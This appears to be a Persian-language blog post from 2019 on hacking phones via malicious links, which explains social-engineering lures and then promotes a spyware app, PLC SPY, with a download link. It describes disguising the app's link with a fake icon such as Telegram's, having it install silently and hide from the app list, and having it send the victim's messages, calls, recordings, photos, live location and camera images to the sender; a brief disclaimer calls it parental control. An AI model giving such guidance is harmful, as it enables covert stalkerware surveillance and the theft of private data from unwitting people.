هک گوشی با لینک آلوده را چگونه انجام دهیم؟

آموزش برنامه نویسی
آموزش برنامه نویسی هک و نفوذ به گوشی و سیستم های مختلف
آوریل 20, 2019
ردیابی شماره تلفن چگونه انجام می شود؟ آیا نرم افزاری وجود دارد؟
آوریل 24, 2019

هک گوشی با لینک آلوده را چگونه انجام دهیم؟

هک گوشی با لینک

امروزه واژه ی هک به یکی از پرکاربردترین واژه ها در دنیای تکنولوژی تبدیل شده است. افراد زیادی به دنبال روش های هک و نفوذ به دستگاه های هوشمند هستند و در مقابل نیز کسانی وجود دارند که در پی یافتن راهی برای جلوگیری ازهک شدن می باشند. اما در این بین روش های زیادی برای هک دستگاه های مختلف از جمله گوشی ها وجود دارد. یکی از این روش ها که شاید توجه کمتری به آن شده باشد، هک گوشی با لینک می باشد. هک گوشی با لینک یکی از روش هایی است که هکرهای حرفه ای بسیار از آن استفاده می کنند، اما متاسفانه افرادی که می خواهند از هک دستگاه های خود جلوگیری کنند، توجه کمتری به لینک هایی که روی آن کلیک می کنند، دارند. از همین رو در این مطلب قصد داریم به طور مفصل درباره روش هک گوشی با لینک های آلوده صحبت کنیم و به بررسی نحوه شناسایی آنها و معرفی نرم افزاری برای هک به این روش بپردازیم.

لینک آلوده چیست؟

به طور کلی در دنیای اینترنت و وب، به هر سورس یا گزینه ای که در یک صفحه، داکیومنت، سرویس یا برنامه اینترنتی وجود داشته باشد که اجازه دهد کاربر با استفاده از آن، به صفحه، داکیومنت، سرویس یا برنامه اینترنتی دیگری متصل شود، لینک گفته می شود. به عبارت ساده تر، در صورتی شما در یک صفحه اینترنتی روی یک گزینه کلیک کنید و به صفحه دیگری هدایت شوید، در واقع شما روی یک لینک کلیک کرده اید.

لینک ها بسیار متنوع هستند و می توانند شامل دانلود ها، نمایش ویدیو، پخش موزیک، اجرای برنامه ها، نمایش صفحات و موارد دیگری از این قبیل شوند. بنابراین لینک ها نقش پر رنگی در ایجاد ارتباط در اینترنت دارند و بدون آن ها اینترنت معنای امروزی خود را نخواهد داشت.

در صورتی که شما بدون داشتن برنامه های محافظت کننده، مانند آنتی ویروس ها یا فایروال ها وارد فضای اینترنت شوید و به سایت های مختلف سر بزنید، احتمال این که دستگاه شما به ویروس یا بدافزارها آلوده شود بسیار زیاد است. این بدافزارها و ویروس ها معمولا از طریق لینکهای آلوده ای که شما برروی آنها کلیک می کنید، به سیستمتان منتقل می شوند.

لینک های آلوده نیز کاملا مشابه لینک های مفید موجود در اینترنت بوده و تفاوت چندانی با آن ها ندارند. یک لینک آلوده می تواند در هر شکل و شمایلی در اینترنت وجود داشته باشد. از همین رو شناسایی لینک های آلوده از لینک های مفید امر چندان ساده ای نیست. اصولا لینک های آلوده به مجموعه لینک هایی گفته می شود که کاربر را به مسیری هدایت می کنند که منجر به آسیب رساندن به او و آلوده شدن سیستم وی به ویروس ها و بد افزار ها می شود.

هدف از ساخت لینک های آلوده چیست؟

اما سوالی که ممکن است در ذهن کاربران ایجاد شود، این است که هدف از ساخت لینک های آلوده چیست و چرا چنین لینک های مخربی در محیط اینترنت وجود دارند؟ در پاسخ به این سوال باید گفت که برای ساخت یک لینک آلوده اهداف زیادی وجود دارد که از جمله آن ها می توان به انتشار ویروس ها، انتشار بد افزار ها، بدست آوردن اطلاعات، هک و نفوذ به سیستم ها و مواردی از این دست، اشاره کرد. معمولا ویروس ها و بدافزارها با اهداف مالی و توسط گروه های برنامه نویسان که بعضا سازندگان آنتی ویروس ها هم هستند، انتشار می یابند. اما لینک هایی که با هدف هک و نفوذ به سیستم های دیگران در اختیار کاربران قرار می گیرند، توسط هکرها ساخته می شوند و می توانند اهداف زیادی را دنبال کنند.

هک گوشی با لینک

هک گوشی با لینک آلوده

یکی از روش های هک گوشی و یا سیستم های رایانه ای، ترغیب کاربر قربانی به کلیک بر روی لینک های آلوده می باشد. در این روش، هکر با استفاده از روش هایی که به مهندسی اجتماعی مشهور است، اقدام به جذب کاربر برای کلیک روی لینک آلوده می کند. به طور مثال هکر با وعده هایی همچون نمایش فیلمی مخفی از افراد مشهور یا وعده ی شرکت در قرعه کشی بزرگ، برای قربانی به نوعی دام پهن می کند و از آن طریق او را مجاب می کند که روی لینک مخرب کلیک نماید. پس از کلیک روی این لینک برنامه ای در پشت پرده اقدام به سرقت اطلاعات هدف خواهد نمود و به این ترتیب هک گوشی با لینک انجام می شود.

همانطور که متوجه شدید برای این که بتوانید شخصی را با استفاده از یک لینک هک کنید، آن لینک باید حاوی یک برنامه یا نرم افزاری باشد که قابلیت ارسال اطلاعات را به طور مخفی به شما بدهد.

برای این کار نرم افزارها یا تروجان های زیادی وجود دارد، که یکی از موفق ترین آنها در این زمینه نرم افزار PLC SPY می باشد. این نرم افزار در نسخه های مختلف ارائه شده است که در آخرین نسخه قابلیت ارسال لینک را در اختیار کاربران خود قرار داده است. به این شکل که شما با ارسال لینک برنامه با آیکون دلخواه خود مثلا تلگرام بدون فیلترشکن برای شخص موردنظرتان از او می خواهید که برروی لینک کلیک نماید و به محض کلیک هدف بر روی لینک، برنامه به طور خودکار نصب شده و سپس از لیست برنامه های موبایل پنهان می شود تا شخص موردنظر متوجه عملکرد این برنامه نشود.

پس از نصب، برنامه شروع به ارسال تمام اطلاعات موجود در گوشی موبایل هدف برای شما می کند، اطلاعاتی مانند لیست پیامکهای ارسالی و دریافتی، لیست تماس ها، شنود مکالمات، تصاویر موجود در گالری، موقعیت مکانی لحظه به لحظه و مشاهده تصاویر اطراف توسط دوربین گوشی هدف.

برنامه هک گوشی plc spy

برای دانلود و دریافت فیلم آموزش نصب این برنامه می توانید برروی لینک قرمز رنگ زیر کلیک نمایید.

نرم افزار PLC SPY

توجه داشته باشید که برنامه plc spy توسط سامانه کنترل فرزند ساخته شده و این سامانه تنها به جهت فرهنگ سازی و نظارت بر خانواده می باشد و استفاده های غیره، از نظر قوانین این سامانه و قوانین جمهوری اسلامی ایران غیرقانونی می باشد.

بازدیدها: 9023

دیدگاهتان را بنویسید